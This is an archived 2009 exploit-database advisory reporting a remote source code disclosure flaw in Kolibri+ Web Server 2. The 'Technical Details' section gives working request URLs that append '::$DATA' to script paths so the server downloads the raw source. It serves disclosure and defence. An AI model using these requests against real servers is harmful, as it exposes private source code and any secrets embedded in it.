Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #2

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #2
# Published : 2009-09-11
# Author : Dr_IDE
# Previous Title : Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit
# Next Title : Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule

#################################################################################
#                                                                        	#
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure 		#
# aka:		More fun with Kolibri+ 2 webserver 		         	#
# Found By:	Dr_IDE								#
# Tested On:	Windows XPSP3                                            	#
#                                                                        	#
#################################################################################

- Description -

Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available. 

This vulnerability is similar to the one reported earlier by Skull-HacKeR.

Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][::$DATA]

	http://172.16.2.101/default.asp::$DATA

	http://172.16.2.101/index.php::$DATA

# www.Syue.com [2009-09-11]